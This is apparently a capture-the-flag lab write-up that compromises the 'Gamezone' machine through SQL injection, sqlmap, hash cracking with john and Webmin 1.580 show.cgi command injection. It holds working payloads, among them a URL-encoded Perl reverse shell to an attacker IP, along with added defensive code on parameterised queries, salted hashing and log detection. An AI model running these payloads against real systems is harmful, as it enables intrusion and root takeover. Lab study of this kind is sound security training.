Gamezone
Overview

Recon
nmap -A -T4 -Pn -oA nmap1000.gamezone.txt 10.10.139.135

Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:02 EDT
Nmap scan report for 10.10.139.135
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/21%OT=22%CT=1%CU=42848%PV=Y%DS=4%DC=T%G=Y%TM=5F694D3
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 7.70 ms 10.6.0.1
2 ... 3
4 79.58 ms 10.10.139.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.90 seconds

Enumeration
Only ports 22 and 80 are open and nothing else stands out, so let's open port 80 in the browser.

Per the room instructions, the login form on this machine is vulnerable to SQL injection, so try different inputs to see whether you can get in.
I was able to get in with my first couple of tries. The following input works -
1' or 1 =1;--
As soon as you hit Enter you are redirected to http://10.10.139.135/portal.php. As the room instructions suggest, the next step is the search box on portal.php. At this point set up your Burp proxy, submit a search so you can intercept the request, and save it to a file.
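To see why the payload above gets past the login, here is an added example (not code from the room or this writeup) that runs the same input against a string-built query and against a parameterised one. The table, column names and stored value are constructed, and SQLite stands in for the MySQL backend.

```python
import sqlite3

# Constructed stand-in for the Game Zone users table (columns match the sqlmap dump).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
conn.execute("INSERT INTO users VALUES ('agent47', 'constructed-hash')")

# The login-bypass payload used in the writeup.
PAYLOAD = "1' or 1 =1;--"


def login_vulnerable(username: str, password: str):
    """String-built query: the attacker's quote closes the literal, 'or 1 =1'
    makes the WHERE clause always true, and '--' comments out the password check."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pwd = '{password}'")
    return conn.execute(sql).fetchone()


def login_hardened(username: str, password: str):
    """Parameterised query: the payload is compared as an ordinary string value
    and never changes the structure of the statement."""
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, "anything"))  # ('agent47',)
    print("hardened:  ", login_hardened(PAYLOAD, "anything"))    # None
```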

Hint: Save the raw request as a text file.
POST /portal.php HTTP/1.1
Host: 10.10.139.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.139.135/portal.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Connection: close
Cookie: PHPSESSID=t1onpvp2errfn3vibjs9tp76q3
Upgrade-Insecure-Requests: 1

searchitem=doom

Now, let's run sqlmap against the saved request:
#sqlmap -r search-request.txt --dbms=mysql --dump
...
...
...
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | xxxxxxx |
+------------------------------------------------------------------+----------+

[21:49:35] [INFO] table 'db.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.139.135/dump/db/users.csv'

Now that we have a password hash (64 hex characters, which points to SHA-256), we can try to crack it with john using the Raw-SHA256 format.
# john user-hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
XXXXXXXXXXXXXX (?)
1g 0:00:00:00 DONE (2020-09-21 21:56) 5.555g/s 16201Kp/s 16201Kc/s 16201KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

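An added example (not part of the writeup) showing why the unsalted SHA-256 above fell to a wordlist in well under a second, next to the salted, iterated PBKDF2 storage the application should have used instead. The wordlist is a constructed stand-in for rockyou.txt.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for rockyou.txt (not the real list).
WORDLIST = ["password", "letmein", "qwerty", "constructed-pass-2020"]


def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()


def crack_unsalted_sha256(target_hex: str, wordlist):
    """What 'john --format=Raw-SHA256' does: hash each candidate and compare.
    SHA-256 is designed to be fast, so millions of guesses per second are trivial,
    and with no salt one precomputed table covers every user at once."""
    for word in wordlist:
        if hmac.compare_digest(sha256_hex(word), target_hex):
            return word
    return None


def hash_password(password: str, salt=None, iterations=600_000) -> str:
    """Store a per-user random salt and an iterated PBKDF2-HMAC-SHA256 digest.
    Each guess now costs the attacker 'iterations' hash computations."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = sha256_hex("letmein")            # what the 'pwd' column held
    print("recovered:", crack_unsalted_sha256(leaked, WORDLIST))
    stored = hash_password("letmein")
    print("stored:", stored)
    print("verify ok:", verify_password("letmein", stored))
```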
Exploit
With the password cracked, we can now try to log in over SSH (recall that SSH is listening on its default port, 22).
# ssh agent47@10.10.139.135
The authenticity of host '10.10.139.135 (10.10.139.135)' can't be established.
ECDSA key fingerprint is SHA256:mpNHvzp9GPoOcwmWV/TMXiGwcqLIsVXDp5DvW26MFi8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.139.135' (ECDSA) to the list of known hosts.
agent47@10.10.139.135's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.


Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ ls -l
total 4
-rw-rw-r-- 1 agent47 agent47 33 Aug 16 2019 user.txt
agent47@gamezone:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

In the user's home directory we find user.txt, which holds the user flag. Enumerating the locally listening ports shows port 10000 in use.
agent47@gamezone:~$ netstat -lnt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
agent47@gamezone:~$


agent47@gamezone:~$ curl localhost:10000
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
<title>Login to Webmin</title></head>
<body bgcolor=#ffffff link=#0000ee vlink=#0000ee text=#000000 onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
<table class='header' width=100%><tr>
<td id='headln2l' width=15% valign=top align=left></td>
<td id='headln2c' align=center width=70%><font size=+2></font></td>
<td id='headln2r' width=15% valign=top align=right></td></tr></table>
<p><center>

The login page shows that Webmin is running. Let's find out which version is installed:
agent47@gamezone:~$ apt search webmin
Sorting... Done
Full Text Search... Done
webmin/now 1.580 all [installed,local]
 web-based administration interface for Unix systems

agent47@gamezone:~$

We now know that Webmin 1.580 is installed, and the Webmin process appears to be running as root.
Now forward port 10000 over SSH and access it from the browser:
$ ssh -L 10000:localhost:10000 agent47@10.10.139.135
agent47@10.10.139.135's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

In the browser, visit http://localhost:10000 and you will be greeted with the login form. I tried the agent47 username and password and it worked! Let's look for known vulnerabilities in Webmin 1.580 using searchsploit.
searchsploit webmin 1.58
---------------------------------------------------------------------- ---------------------------------
 Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | unix/remote/21851.rb
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | multiple/remote/2017.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | multiple/remote/1997.php
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb
---------------------------------------------------------------------- ---------------------------------
Read unix/remote/21851.rb and you will see a simple way to execute a payload.

show.cgi looks interesting and can be leveraged to execute payloads. I tried reading several OS files through it from the browser.


That obviously includes /root/root.txt, the root flag. However, there is more to try and learn here.
Post Exploit - Privesc
Start a local listener
nc -lvnp 9000
Now, let's try to get a reverse shell as root (reverse shell reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md).
In the local browser:
http://localhost:10000/file/show.cgi/4uIPiqNld|perl%20-e%20'use%20Socket;$i=%2210.6.19.215%22;$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'|
You should now get a shell back.
$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.248.24] 37924
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#
There we have it!
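From the defender's side, the show.cgi abuse above leaves a clear trace: the file segment of the request path carries shell metacharacters. This added example (not part of the writeup) flags such requests in Webmin access-log lines; the lines are constructed in combined log format, so the regex assumes that layout, and a real deployment would also need the Webmin upgrade that removes the bug.

```python
import re
from urllib.parse import unquote

# Constructed Webmin access-log lines in combined format; not taken from the target.
SAMPLE_LOG = """\
10.6.19.215 - agent47 [21/Sep/2020:22:10:01 -0400] "GET /file/show.cgi/etc/hostname HTTP/1.1" 200 512
10.6.19.215 - agent47 [21/Sep/2020:22:11:30 -0400] "GET /file/show.cgi/4uIPiqNld|perl%20-e%20'use%20Socket;...'| HTTP/1.1" 200 0
10.6.19.215 - agent47 [21/Sep/2020:22:12:05 -0400] "POST /session_login.cgi HTTP/1.1" 302 0
10.6.19.215 - agent47 [21/Sep/2020:22:13:44 -0400] "GET /file/show.cgi/tmp/a%7Cid%7C HTTP/1.1" 200 40
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# A file name handed to a shell should never contain these.
SHELL_META = re.compile(r"[|;`]|\$\(")


def find_show_cgi_injection(log_text: str):
    """Return one finding per /file/show.cgi request whose file segment
    contains a shell metacharacter (after URL-decoding, so %7C is caught too)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m["path"])
        if not path.startswith("/file/show.cgi/"):
            continue
        file_part = path[len("/file/show.cgi"):]
        meta = SHELL_META.search(file_part)
        if meta:
            hits.append({"ip": m["ip"], "user": m["user"], "ts": m["ts"],
                         "file": file_part[:60], "metachar": meta.group(0)})
    return hits


if __name__ == "__main__":
    for hit in find_show_cgi_injection(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} user={hit['user']} "
              f"metachar={hit['metachar']!r} file={hit['file']!r}")
```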